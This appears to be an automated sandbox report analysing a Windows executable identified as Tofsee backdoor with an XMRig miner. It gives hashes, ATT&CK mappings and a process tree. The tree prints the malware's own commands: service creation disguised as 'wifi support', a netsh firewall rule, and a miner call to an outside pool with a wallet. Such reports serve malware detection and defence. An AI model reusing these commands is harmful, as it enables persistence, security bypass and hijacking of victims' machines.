Analysis

  • max time kernel
    146s
  • max time network
    143s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    13-02-2021 11:30

General

  • Target

    keevgpgi.exe

  • Size

    11.6MB

  • MD5

    cecab87eece6151682a5dffe04831bb6

  • SHA1

    e3d6a4c3d0f25f63abf5aa5c906da1b681462714

  • SHA256

    27a880b8a04d59fa74e9ca0c7db57718599f1efca0c593739c12cb1fad9040dc

  • SHA512

    1d39a758f9415b493fee4bc0921bfa627d2939d21386a7cd3b9b8f216d75e5025a5f3ff6414b6bfaf2a8acac817cf42a77005677e99ff10094572318a4933ebd

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\keevgpgi.exe
    "C:\Users\Admin\AppData\Local\Temp\keevgpgi.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3888
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bcdgczco\
      2⤵
        PID:3356
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ajdiazuq.exe" C:\Windows\SysWOW64\bcdgczco\
        2⤵
          PID:2392
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create bcdgczco binPath= "C:\Windows\SysWOW64\bcdgczco\ajdiazuq.exe /d\"C:\Users\Admin\AppData\Local\Temp\keevgpgi.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:2888
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description bcdgczco "wifi internet conection"
            2⤵
              PID:8
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start bcdgczco
              2⤵
                PID:1352
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:2828
              • C:\Windows\SysWOW64\bcdgczco\ajdiazuq.exe
                C:\Windows\SysWOW64\bcdgczco\ajdiazuq.exe /d"C:\Users\Admin\AppData\Local\Temp\keevgpgi.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1988
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:2528
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3360

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Persistence

              New Service

              1
              T1050

              Modify Existing Service

              1
              T1031

              Registry Run Keys / Startup Folder

              1
              T1060

              Privilege Escalation

              New Service

              1
              T1050

              Defense Evasion

              Disabling Security Tools

              1
              T1089

              Modify Registry

              2
              T1112

              Discovery

              System Information Discovery

              1
              T1082

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\ajdiazuq.exe
                MD5

                06f28ec12609f150be265a5388b44929

                SHA1

                5d11563e37e111fdf97e2fccdef8cf0db290f7e9

                SHA256

                eed5b76ae9d99acbf91eb643c2f6df6448903891ed356ebe64691206873cd86d

                SHA512

                ae3886db1389c16bc20b68ae149293f352b569a8e273570b129d6ec1249d5133833da79d2ebbb62180f897b6789f5acb6ae5aecf56a27cafca416502c6327288

              • C:\Windows\SysWOW64\bcdgczco\ajdiazuq.exe
                MD5

                06f28ec12609f150be265a5388b44929

                SHA1

                5d11563e37e111fdf97e2fccdef8cf0db290f7e9

                SHA256

                eed5b76ae9d99acbf91eb643c2f6df6448903891ed356ebe64691206873cd86d

                SHA512

                ae3886db1389c16bc20b68ae149293f352b569a8e273570b129d6ec1249d5133833da79d2ebbb62180f897b6789f5acb6ae5aecf56a27cafca416502c6327288

              • memory/8-9-0x0000000000000000-mapping.dmp
              • memory/1352-10-0x0000000000000000-mapping.dmp
              • memory/1988-13-0x00000000009F0000-0x00000000009F1000-memory.dmp
                Filesize

                4KB

              • memory/2392-6-0x0000000000000000-mapping.dmp
              • memory/2528-14-0x0000000003090000-0x00000000030A5000-memory.dmp
                Filesize

                84KB

              • memory/2528-15-0x0000000003099A6B-mapping.dmp
              • memory/2528-19-0x0000000004F50000-0x000000000515F000-memory.dmp
                Filesize

                2.1MB

              • memory/2528-20-0x00000000030D0000-0x00000000030D6000-memory.dmp
                Filesize

                24KB

              • memory/2828-12-0x0000000000000000-mapping.dmp
              • memory/2888-8-0x0000000000000000-mapping.dmp
              • memory/3356-3-0x0000000000000000-mapping.dmp
              • memory/3360-21-0x0000000002290000-0x0000000002381000-memory.dmp
                Filesize

                964KB

              • memory/3360-23-0x000000000232259C-mapping.dmp
              • memory/3888-2-0x0000000000A30000-0x0000000000A31000-memory.dmp
                Filesize

                4KB

              • memory/3888-4-0x0000000000930000-0x0000000000943000-memory.dmp
                Filesize

                76KB

              • memory/3888-5-0x0000000000400000-0x0000000000415000-memory.dmp
                Filesize

                84KB